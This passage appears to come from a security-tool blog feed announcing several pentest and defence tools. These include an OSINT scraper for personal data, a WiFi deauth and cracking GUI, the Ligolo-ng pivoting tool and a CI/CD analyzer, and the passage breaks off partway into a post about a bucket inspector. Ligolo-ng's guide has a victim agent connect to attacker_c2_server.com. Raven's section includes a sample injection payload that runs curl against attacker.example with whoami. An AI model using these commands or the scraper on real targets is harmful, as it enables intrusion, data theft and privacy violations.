Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the page, and it supports multithreading to make the process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
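At its core this boils down to fetching pages and running regular expressions over them. Below is a minimal Python sketch of that idea; Uscrapper's own patterns, crawling, multithreading and anti-scraping bypasses are far more involved, and the URL is just an example.

import re
import requests

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
PHONE_RE = re.compile(r"\+?\d[\d\s().-]{7,}\d")

def scrape(url):
    # Fetch the page and pull anything that looks like an email address or phone number.
    html = requests.get(url, timeout=10, headers={"User-Agent": "Mozilla/5.0"}).text
    return {
        "emails": sorted(set(EMAIL_RE.findall(html))),
        "phones": sorted(set(PHONE_RE.findall(html))),
    }

print(scrape("https://example.com"))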


Extracted Details:

Uscrapper extracts the following details from the provided website:

  • Email Addresses: Displays email addresses found on the website.
  • Social Media Links: Displays links to various social media platforms found on the website.
  • Author Names: Displays the names of authors associated with the website.
  • Geolocations: Displays geolocation information associated with the website.
  • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website, including email addresses, phone numbers and usernames.

What's New?:

Uscrapper 2.0:

  • Introduced multiple modules to bypass anti-web-scraping techniques.
  • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
  • Implemented Multithreading to make these processes faster.

Installation Steps:

git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/ 
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

Usage:

To run Uscrapper, use the following command-line syntax:

python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


Arguments:

  • -h, --help: Show the help message and exit.
  • -u URL, --url URL: Specify the URL of the website to extract details from.
  • -c INT, --crawl INT: Specify the number of links to crawl
  • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
  • -O, --generate-report: Generate a report file containing the extracted details.
  • -ns, --nonstrict: Display non-strict usernames during extraction.

Note:

  • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

  • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

  • To bypass some anti-web-scraping methods we have used Selenium, which can make the overall process slower.

Contribution:

Want a new feature to be added?

  • Make a pull request with all the necessary details and it will be merged after a review.
  • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


Rayder - A Lightweight Tool For Orchestrating And Organizing Your Bug Hunting Recon / Pentesting Command-Line Workflows

By: Zion3R
23 January 2024 at 11:30


Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them in parallel when the commands do not depend on each other.


Installation

To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:

go install github.com/devanshbatham/rayder@latest

Usage

Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:

rayder -w path/to/workflow.yaml

Workflow Configuration

A workflow is defined in a YAML file with the following structure:

vars:
  VAR_NAME: value
  # Add more variables...

parallel: true|false
modules:
  - name: task-name
    cmds:
      - command-1
      - command-2
      # Add more commands...
    silent: true|false
  # Add more modules...

Using Variables in Workflows

Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).

Defining Variables

To define variables, add them to the vars section of your workflow YAML file:

vars:
  VAR_NAME: value
  ANOTHER_VAR: another_value
  # Add more variables...

Referencing Variables in Commands

You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:

modules:
  - name: example-task
    cmds:
      - echo "Output directory {{OUTPUT_DIR}}"

Supplying Variables via the Command Line

You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:

rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value

If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.

Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
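Conceptually, the substitution and precedence work like this. The snippet below is a hypothetical Python sketch, not Rayder's Go implementation; the helper name and sample values are made up.

import re
import sys

def render(command, defaults, overrides):
    # Command-line overrides win over the defaults from the vars section.
    values = {**defaults, **overrides}
    return re.sub(r"\{\{(\w+)\}\}", lambda m: values.get(m.group(1), m.group(0)), command)

defaults = {"ORG": "example.org", "OUTPUT_DIR": "results"}
overrides = dict(arg.split("=", 1) for arg in sys.argv[1:] if "=" in arg)
print(render('echo "Output directory {{OUTPUT_DIR}}"', defaults, overrides))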

Example

Example 1:

Here's an example of how you can define, reference, and supply variables in your workflow configuration:

vars:
  ORG: "example.org"
  OUTPUT_DIR: "results"

modules:
  - name: example-task
    cmds:
      - echo "Organization {{ORG}}"
      - echo "Output directory {{OUTPUT_DIR}}"

When executing the workflow, you can provide values for ORG and OUTPUT_DIR via the command line like this:

rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir

This will override the default values and use the provided values for these variables.

Example 2:

Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:

vars:
  ORG: "Acme, Inc"
  OUTPUT_DIR: "results-dir"

parallel: false
modules:
  - name: reverse-whois
    silent: false
    cmds:
      - mkdir -p {{OUTPUT_DIR}}
      - revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt

  - name: finding-subdomains
    cmds:
      - xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
    silent: false

  - name: cleaning-subdomains
    cmds:
      - cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
      - rm *.out
    silent: true

  - name: resolving-subdomains
    cmds:
      - cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
    silent: false

  - name: checking-alive-subdomains
    cmds:
      - cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 -o {{OUTPUT_DIR}}/alive-subdomains.txt
    silent: false

To execute the above workflow, run the following command:

rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results

Parallel Execution

The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.

Workflows

Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!

Inspiration

The inspiration for this project comes from the awesome Taskfile project.



Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

By: Zion3R
24 January 2024 at 11:30


Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

⭐ Don't forget to put a star if you like the project!

Legal

Airgorah is designed to be used for testing and discovering flaws in networks you own. Performing attacks on WiFi networks you do not own is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.

Requirements

This software only works on Linux and requires root privileges to run.

You will also need a wireless network card that supports monitor mode and packet injection.

Installation

The installation instructions are available here.

Usage

The documentation about the usage of the application is available here.

License

This project is released under MIT license.

Contributing

If you have any questions about the usage of the application, do not hesitate to open a discussion.

If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request.



Antisquat - Leverages AI Techniques Such As NLP, ChatGPT And More To Empower Detection Of Typosquatting And Phishing Domains

By: Zion3R
25 January 2024 at 11:30


AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.


How to use

  • Clone the project via git clone https://github.com/redhuntlabs/antisquat.
  • Install all dependencies by typing pip install -r requirements.txt.
  • Get a ChatGPT API key at https://platform.openai.com/account/api-keys
  • Create a file named .openai-key and paste your ChatGPT API key in there.
  • (Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your GoDaddy API key in there.
  • Create a file named 'domains.txt'. Type in a line-separated list of domains you'd like to scan.
  • (Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you'd like to ignore. Regular expressions are supported.
  • Run antisquat using python3.8 antisquat.py domains.txt

Examples:

Let's say you'd like to run antisquat on "flipkart.com".

Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.

AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.
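As a rough idea of what "permutations" means here, the toy Python generator below produces a few common typo variants (omission, adjacent swap, repetition). AntiSquat's own generation and NLP-based scoring are considerably more advanced; this is only an illustration.

def typo_permutations(domain):
    # Generate a handful of simple typosquat candidates for a second-level domain.
    name, _, tld = domain.partition(".")
    candidates = set()
    for i in range(len(name)):
        candidates.add(name[:i] + name[i + 1:] + "." + tld)            # character omission
        if i < len(name) - 1:
            swapped = name[:i] + name[i + 1] + name[i] + name[i + 2:]
            candidates.add(swapped + "." + tld)                        # adjacent swap
        candidates.add(name[:i] + name[i] + name[i:] + "." + tld)      # character repetition
    candidates.discard(domain)
    return sorted(candidates)

print(typo_permutations("flipkart.com")[:10])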

Test case:

A test case for amazon.com is attached. To run it without any API keys, simply run python3.8 test.py

Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.

If you'd like to know more about the tool, make sure to check out our blog.

Acknowledgements

To know more about our Attack Surface Management platform, check out NVADR.



Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R
26 January 2024 at 11:30


Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using gVisor.

When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.

As an example, for a TCP connection:

  • SYN packets are translated to a connect() on the remote host
  • A SYN-ACK is sent back if connect() succeeds
  • A RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED is returned by connect()
  • Nothing is sent on timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).
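A tiny Python sketch of that translation logic, purely for illustration (Ligolo-ng implements this in Go inside its gVisor-based userland stack):

import errno
import socket

def syn_to_connect(dst_ip, dst_port, timeout=4):
    # Map a captured SYN to a real connect() on the agent and decide what to send back.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((dst_ip, dst_port))
        return "SYN-ACK"   # connection succeeded
    except socket.timeout:
        return None        # send nothing; let the scanner time out
    except OSError as exc:
        if exc.errno in (errno.ECONNREFUSED, errno.ECONNRESET, errno.ECONNABORTED):
            return "RST"   # reflect the refusal as a TCP reset
        raise
    finally:
        s.close()

print(syn_to_connect("192.168.0.1", 80))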

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] » ifconfig
[...]
┌───────────────────────────────────────┐
│              Interface 3              │
├──────────────┬────────────────────────┤
│ Name         │ wlp3s0                 │
│ Hardware MAC │ de:ad:be:ef:ca:fe      │
│ MTU          │ 1500                   │
│ Flags        │ up|broadcast|multicast │
│ IPv4 Address │ 192.168.0.30/24        │
└──────────────┴────────────────────────┘

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx     Mét     MTU     État        Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] » listener_list
┌───────────────────────────────────────────────────────────────────────────────┐
│                                Active listeners                               │
├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
│ # │ AGENT                   │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234           │ 127.0.0.1:4321         │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘

[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

Caveats

Because the agent is running without privileges, it's not possible to forward raw packets. When you perform an Nmap SYN scan, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.

Todo

  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.

Credits

  • Nicolas Chatelain <nicolas -at- chatelain.me>


Route-Detect - Find Authentication (Authn) And Authorization (Authz) Security Bugs In Web Application Routes

By: Zion3R
27 January 2024 at 11:30


Find authentication (authn) and authorization (authz) security bugs in web application routes:


Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:

Supported web frameworks (route-detect IDs in parentheses):

  • Python: Django (django, django-rest-framework), Flask (flask), Sanic (sanic)
  • PHP: Laravel (laravel), Symfony (symfony), CakePHP (cakephp)
  • Ruby: Rails* (rails), Grape (grape)
  • Java: JAX-RS (jax-rs), Spring (spring)
  • Go: Gorilla (gorilla), Gin (gin), Chi (chi)
  • JavaScript/TypeScript: Express (express), React (react), Angular (angular)

*Rails support is limited. Please see this issue for more information.

Installing

Use pip to install route-detect:

$ python -m pip install --upgrade route-detect

You can check that route-detect is installed correctly with the following command:

$ echo 'print(1 == 1)' | semgrep --config $(routes which test-route-detect) -
Scanning 1 file.

Findings:

/tmp/stdin
routes.rules.test-route-detect
Found '1 == 1', your route-detect installation is working correctly

1┆ print(1 == 1)


Ran 1 rule on 1 file: 1 finding.

Using

route-detect provides the routes CLI command and uses semgrep to search for routes.

Use the which subcommand to point semgrep at the correct web application rules:

$ semgrep --config $(routes which django) path/to/django/code

Use the viz subcommand to visualize route information in your browser:

$ semgrep --json --config $(routes which django) --output routes.json path/to/django/code
$ routes viz --browser routes.json

If you're not sure which framework to look for, you can use the special all ID to check everything:

$ semgrep --json --config $(routes which all) --output routes.json path/to/code

If you have custom authn or authz logic, you can copy route-detect's rules:

$ cp $(routes which django) my-django.yml

Then you can modify the rule as necessary and run it like above:

$ semgrep --json --config my-django.yml --output routes.json path/to/django/code
$ routes viz --browser routes.json

Contributing

route-detect uses poetry for dependency and configuration management.

Before proceeding, install project dependencies with the following command:

$ poetry install --with dev

Linting

Lint all project files with the following command:

$ poetry run pre-commit run --all-files

Testing

Run Python tests with the following command:

$ poetry run pytest --cov

Run Semgrep rule tests with the following command:

$ poetry run semgrep --test --config routes/rules/ tests/test_rules/


Raven - CI/CD Security Analyzer

By: Zion3R
28 January 2024 at 11:30


RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


What is Raven

The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

  • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
  • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
  • Query Library: We created a library of pre-defined queries based on research conducted by the community.
  • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

Possible usages for Raven:

  • Scanner for your own organization's security
  • Scanning specified organizations for bug bounty purposes
  • Scan everything and report issues found to save the internet
  • Research and learning purposes

This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

Why Raven

In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

  • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
  • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
  • We detailed a completely different attack vector, 3rd-party integration risks, affecting the most popular project on GitHub and thousands more.
  • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
  • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

It was for these reasons that Raven was created: a framework for CI/CD security analysis, with GitHub Actions workflows as the first use case. In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

Setup && Run

To get started with Raven, follow these installation instructions:

Step 1: Install the Raven package

pip3 install raven-cycode

Step 2: Setup a local Redis server and Neo4j database

docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

Another way to setup the environment is by running our provided docker compose file:

git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup

Step 3: Run Raven Downloader

Org mode:

raven download org --token $GITHUB_TOKEN --org-name RavenDemo

Crawl mode:

raven download crawl --token $GITHUB_TOKEN --min-stars 1000

Step 4: Run Raven Indexer

raven index

Step 5: Inspect the results through the reporter

raven report --format raw

At this point, it is possible to inspect the data in the Neo4j database by connecting to http://localhost:7474/browser/.
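For programmatic access, a minimal sketch using the official neo4j Python driver is shown below; the connection details match the defaults above, while the Workflow label and path property are assumptions about Raven's data model that you should verify in the Neo4j browser first.

# Minimal sketch: query Raven's Neo4j database with the official Python driver.
# The node label "Workflow" and its "path" property are assumed, not confirmed.
from neo4j import GraphDatabase

driver = GraphDatabase.driver("neo4j://localhost:7687", auth=("neo4j", "123456789"))
with driver.session() as session:
    for record in session.run("MATCH (w:Workflow) RETURN w.path AS path LIMIT 10"):
        print(record["path"])
driver.close()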

Prerequisites

  • Python 3.9+
  • Docker Compose v2.1.0+
  • Docker Engine v1.13.0+

Infrastructure

Raven uses two primary Docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

Usage

The tool provides three main functionalities: download, index, and report.

Download

Download Organization Repositories

usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows

Download Public Repositories

usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default: 1000

Index

usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--debug Whether to print debug statements, default: False

Report

usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...

positional arguments:
{slack}
slack Send report to slack channel

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)

Examples

Retrieve all workflows and actions associated with the organization.

raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

Scrape all publicly accessible GitHub repositories.

raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

raven index --debug

Now, we can generate a report using our query library.

raven report --severity high --tag injection --tag unauthenticated

Rate Limiting

For effective rate limiting, you should supply a Github token. For authenticated users, the following rate limits apply:

  • Code search - 30 queries per minute
  • Any other API - 5000 per hour

Research Knowledge Base

Current Limitations

  • It is possible to run an external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
  • It is possible to run an external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
  • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is to try to find it in the existing repository.
  • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

Future Research Work

  • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is an attacker-controllable parameter) to an action parameter named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path to code execution (see the sketch after this list).
  • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
  • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.
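As a concrete illustration of the taint-analysis use case above (a simplified sketch, not Raven code; the payload and attacker URL are hypothetical), the following Python mimics how an expression like ${{ inputs.data }} is expanded into a run: script as plain text before the shell ever executes it:

# Hypothetical illustration: template expansion happens before shell execution,
# so attacker-controlled input becomes part of the script itself.
pr_title = 'hello"; curl https://attacker.example/$(whoami) #'  # attacker-controlled value
step_template = 'echo "{data}"'                                 # stands in for: run: echo "${{ inputs.data }}"
rendered = step_template.format(data=pr_title)                  # plain text substitution

print(rendered)
# Feeding `rendered` to a shell (e.g. bash -c) would execute the injected curl command.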

Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery lifecycle.

If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



BucketLoot - An Automated S3-compatible Bucket Inspector

By: Zion3R
29 January 2024 at 11:30


BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response; if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

Features

Secret Scanning

